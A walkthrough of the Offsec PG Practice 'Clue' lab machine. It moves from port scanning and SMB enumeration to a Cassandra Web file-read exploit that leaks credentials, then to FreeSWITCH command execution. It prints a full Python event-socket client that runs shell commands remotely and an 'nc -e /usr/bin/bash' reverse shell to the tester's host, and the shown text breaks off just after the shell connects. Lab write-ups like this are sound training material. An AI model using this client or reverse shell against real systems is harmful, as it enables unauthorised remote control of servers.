Clue Walkthrough
Platform: Offsec | PG Practice
Difficulty: Very Hard
OS: Linux
Author: Pawan Kumar (Vulntricks)
🛰️ 1. Reconnaissance
Quick Scan using RustScan
└─$ rustscan -a $IP
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
139/tcp open netbios-ssn syn-ack ttl 61
445/tcp open microsoft-ds syn-ack ttl 61
3000/tcp open ppp syn-ack ttl 61
8021/tcp open ftp-proxy syn-ack ttl 61
Nmap Scanning
After discovering the open ports, let's check the service versions:
└─$ nmap -sV -sC -p22,80,139,445,3000,8021 $IP -v -oN nmap_tcp
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3000/tcp open http Thin httpd
| http-methods:
|_ Supported Methods: GET HEAD
|_http-favicon: Unknown favicon MD5: 68089FD7828CD453456756FE6E7C4FD8
|_http-title: Cassandra Web
|_http-server-header: thin
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m36s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: clue
| NetBIOS computer name: CLUE\x00
| Domain name: pg
| FQDN: clue.pg
|_ System time: 2025-07-05T06:53:33-04:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-07-05T10:53:29
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Enumerating port 80
Apache httpd 2.4.38 --> searchsploit turns up:
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation | linux/local/46676.php
Could be vulnerable, but note that this is a local privilege escalation: it only matters once we already have a shell on the box, so I'll keep it in mind for later.
Looking through the website, there is not much to look at: the root returns 403 Forbidden.
Let's enumerate directories a little further:
└─$ gobuster dir --url $URL --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
Found Nothing...
Enumerating SMB
Taking a quick peek on the SMB shares:
└─$ smbclient -L \\\\$IP\\
Looking into it further, it looks like we have 2 folders, and to me they look like usernames, so I'll save them for later.
After looking into it and wasting some time, it turns out they are not users 😅
Enumerating Port 3000
The service says Thin httpd; digging a little, this turns out to be a Ruby web server, so let's have a look at it.
This is the Cassandra Web server, the same name we saw earlier in the SMB share. Interesting!! I think we can do something with this.
Meanwhile I looked into known vulnerabilities for Cassandra:
└─$ searchsploit cassandra
Cassandra Web 0.5.0 - Remote File Read | linux/webapps/49362.py
I am not sure about the exact version, so this is just a try. Hit and try!!
And the exploit worked for me. So what can be done now? Looking into the exploit for details:
It points at a couple of files that look important to me. Let's see:
File /proc/sched_debug:
└─$ python3 49362.py -p 3000 192.168.190.240 /proc/sched_debug
Looks like tasks, PIDs and some more info:
The next file from the exploit is /proc/<cass-web-pid>/cmdline.
If you look at the result of the first command, we see a PID for the cassandra process, so we put that PID into the path as the exploit suggests:
└─$ python3 49362.py -p 3000 192.168.190.240 /proc/930/cmdline
BINGO!! We found some sort of password for user cassie. But no luck with SSH access; it is not the SSH password.
Let's figure out where we can use the password.
Enumerating FreeSWITCH 8021
So I looked for this and found an exploit (47799.py).
I tried the password found via Cassandra Web in the exploit, because the default password did not work.
But that failed again 🥲 So what's the password? We can try to find it with the file read, if we know where FreeSWITCH stores it:
This one failed too...
This time it worked. Found the event socket password now.
Now run the exploit with this password... it worked.
We now have command execution on the server.
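For readers who want to see what the FreeSWITCH exploit is actually doing on the wire, here is an added example of my own (not the walkthrough's code and not exploit 47799): a minimal event socket (ESL) client that reads the server's auth/request frame, sends `auth <password>`, checks for `+OK accepted`, and then runs `api system <cmd>`, which is what produces the `Content-Type: api/response` / `Content-Length` frames seen in the next section. It also shows pulling the password out of an event_socket.conf.xml fetched with the file read; the XML here is a constructed sample with a placeholder value, and the config path is FreeSWITCH's Debian default, which I am assuming for this box since the walkthrough does not show which path was read.

```python
#!/usr/bin/env python3
"""Added example: a minimal FreeSWITCH event socket (ESL) client.

Not the walkthrough's code and not exploit 47799. The XML below is a
constructed sample, and the config path is an assumption for this box."""
import socket
import sys
import xml.etree.ElementTree as ET

# Debian default location of the event socket settings (assumption for this
# box): fetch it with the Cassandra Web file read to recover the password.
EVENT_SOCKET_CONF = "/etc/freeswitch/autoload_configs/event_socket.conf.xml"

# Constructed fragment in the layout of event_socket.conf.xml; placeholder value.
SAMPLE_EVENT_SOCKET_CONF = """<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="0.0.0.0"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="Placeh0lderPass"/>
  </settings>
</configuration>
"""


def esl_password_from_conf(xml_text: str) -> str:
    """Return the value of <param name="password"> from an event_socket.conf.xml."""
    for param in ET.fromstring(xml_text).iter("param"):
        if param.get("name") == "password":
            return param.get("value", "")
    raise ValueError("no password param in event_socket.conf.xml")


def parse_esl_frame(buf: bytes):
    """Split one ESL frame off the front of buf.

    A frame is a header block ended by a blank line (ESL uses bare LF), then a
    body of exactly Content-Length bytes when that header is present. Returns
    (headers, body, rest) or None if buf does not yet hold a whole frame."""
    end = buf.find(b"\n\n")
    if end < 0:
        return None
    headers = {}
    for line in buf[:end].decode("utf-8", "replace").split("\n"):
        key, _, value = line.partition(":")
        headers[key.strip()] = value.strip()
    start = end + 2
    length = int(headers.get("Content-Length", "0"))
    if len(buf) < start + length:
        return None
    return headers, buf[start:start + length], buf[start + length:]


class EslClient:
    """Just enough of the inbound ESL protocol to authenticate and run api commands."""

    def __init__(self, host: str, port: int = 8021, timeout: float = 10):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.buf = b""

    def recv_frame(self):
        while True:
            frame = parse_esl_frame(self.buf)
            if frame is not None:
                headers, body, self.buf = frame
                return headers, body
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("FreeSWITCH closed the socket")
            self.buf += chunk

    def authenticate(self, password: str) -> bool:
        # The server speaks first: "Content-Type: auth/request\n\n".
        headers, _ = self.recv_frame()
        if headers.get("Content-Type") != "auth/request":
            raise RuntimeError(f"unexpected greeting: {headers}")
        self.sock.sendall(f"auth {password}\n\n".encode())
        # Reply is "Content-Type: command/reply" with "+OK accepted" or "-ERR invalid";
        # on -ERR the server drops the connection.
        headers, _ = self.recv_frame()
        return headers.get("Reply-Text", "").startswith("+OK")

    def api(self, command: str) -> str:
        """Run a FreeSWITCH api command; 'system <cmd>' hands <cmd> to a shell."""
        self.sock.sendall(f"api {command}\n\n".encode())
        headers, body = self.recv_frame()
        if headers.get("Content-Type") != "api/response":
            raise RuntimeError(f"unexpected reply: {headers}")
        return body.decode("utf-8", "replace")


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} <host> <password> '<shell command>'")
    client = EslClient(sys.argv[1])
    if not client.authenticate(sys.argv[2]):
        sys.exit("authentication rejected (-ERR invalid)")
    print("Authenticated")
    print(client.api("system " + sys.argv[3]), end="")
```

Because every reply is length-framed, the client never has to guess where a command's output ends, which is also why the exploit output shows `Content-Length: 12` for `/usr/bin/nc` plus its trailing newline.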
🚪 2. Initial Access
Since we already have command execution, let's run some commands.
Checking that commands really execute, and that nc is available:
└─$ python3 47799.py 192.168.190.240 'which nc'
Authenticated
Content-Type: api/response
Content-Length: 12
/usr/bin/nc
Then confirm where bash lives:
└─$ python3 47799.py 192.168.190.240 'which bash'
Authenticated
Content-Type: api/response
Content-Length: 14
/usr/bin/bash
Once confirmed, combine the two into a reverse shell:
└─$ python3 47799.py 192.168.190.240 'nc -e /usr/bin/bash 192.168.45.178 80'
Authenticated
And we got the reverse shell:
└─$ sudo nc -nvlp 80
[sudo] password for kali:
listening on [any] 80 ...
connect to [192.168.45.178] from (UNKNOWN) [192.168.190.240] 47214
ls
bin